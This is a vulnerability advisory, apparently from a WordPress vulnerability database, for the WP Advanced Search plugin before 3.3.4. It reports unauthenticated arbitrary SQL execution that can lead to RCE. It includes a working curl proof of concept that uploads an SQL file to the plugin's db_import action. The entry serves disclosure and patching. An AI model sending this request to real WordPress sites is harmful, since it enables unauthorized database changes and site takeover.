WP Advanced Search < 3.3.4 - Unauthenticated Database Access and Remote Code Execution (RCE)



Description
Arbitrary database queries can be executed in an unauthenticated context of the "WP-Advanced-Search Plugin". E.g. a new administrative account could be added to the WordPress instance, a malicious plugin deployed and therefore Remote Code Execution (RCE) would be possible in the end.
Proof of Concept
# PoC: Update the admin's display name
curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1:8000' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------484865952156175792666168121' -H $'Content-Length: 302' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    --data-binary $'-----------------------------484865952156175792666168121\x0d\x0aContent-Disposition: form-data; name=\"wp_advanced_search_file_import\"; filename=\"test.sql\"\x0d\x0aContent-Type: application/sql\x0d\x0a\x0d\x0aupdate wp_users set display_name=\"Frycos\" where id = 1;\x0a\x0d\x0a-----------------------------484865952156175792666168121--\x0d\x0a' \
    $'http://127.0.0.1:8000/wp-admin/admin-post.php?action=db_import'

Affects Plugin

fixed in version 3.3.4

References

URL https://wordpress.org/plugins/wp-advanced-search/#developers

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Original Researcher Florian Hauser
Submitter Twitter @frycos
Views 1718
Verified No
WPVDB ID 10115

Timeline

Publicly Published 2020-03-05 (3 months ago)
Added 2020-03-05 (3 months ago)
Last Updated 2020-03-06 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin